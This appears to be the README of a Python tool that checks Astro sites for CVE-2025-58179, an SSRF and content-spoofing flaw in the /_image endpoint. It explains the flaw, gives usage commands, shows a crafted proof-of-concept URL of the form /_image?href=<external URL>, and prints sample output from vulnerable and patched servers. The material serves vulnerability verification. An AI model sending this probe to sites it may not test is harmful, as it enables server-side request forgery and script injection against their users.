
Python script to verify SSRF and content spoofing vulnerabilities (CVE-2025-58179) in Astro's `/_image` endpoint, with automated PoC URL generation and HTTP response verification.
CVE-2025-58179-Check is a simple Python script to verify SSRF (Server-Side Request Forgery) / Content Spoofing vulnerability on the /_image endpoint in the Astro framework.
This vulnerability is tracked as GHSA-qpr4-c339-7vq8 and CVE-2025-58179.
This vulnerability impacts Astro sites using the @astrojs/cloudflare adapter with output: 'server' configuration. The /_image endpoint, which is supposed to optimize images, fails to properly validate the href parameter.
This allows an attacker to make the server fetch and serve content from any unauthorized external domain. The impact can be SSRF, and if the external content is a malicious file (such as an SVG containing a script), this can lead to Cross-Site Scripting (XSS).
This script automates the testing process to check if a site is vulnerable to this issue.
Status 200 with Content-Type: image/*).requests library (only if using verification functionality)You can install requests using pip:
pip install requests
CVE-2025-58179-Check.py script.chmod +x CVE-2025-58179-Check.pyThis option will only print the encoded PoC URL. Useful if you want to test manually in a browser or with other tools.
Command:
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>
Example:
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)
Output:
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
This option will generate the URL and immediately send an HTTP GET request to verify the server response.
Command:
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r
Example:
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request
If the server returns a 200 status code and the content type is an image, this indicates the server has fetched and served external content.
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!
A server that has been patched or properly configured will reject requests to unauthorized external domains, usually by returning a 4xx status.
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible
[!WARNING] WARNING
- This script is created for educational purposes and legitimate security testing.
- Users are fully responsible for their actions. Do not use this script on systems you do not have permission to test.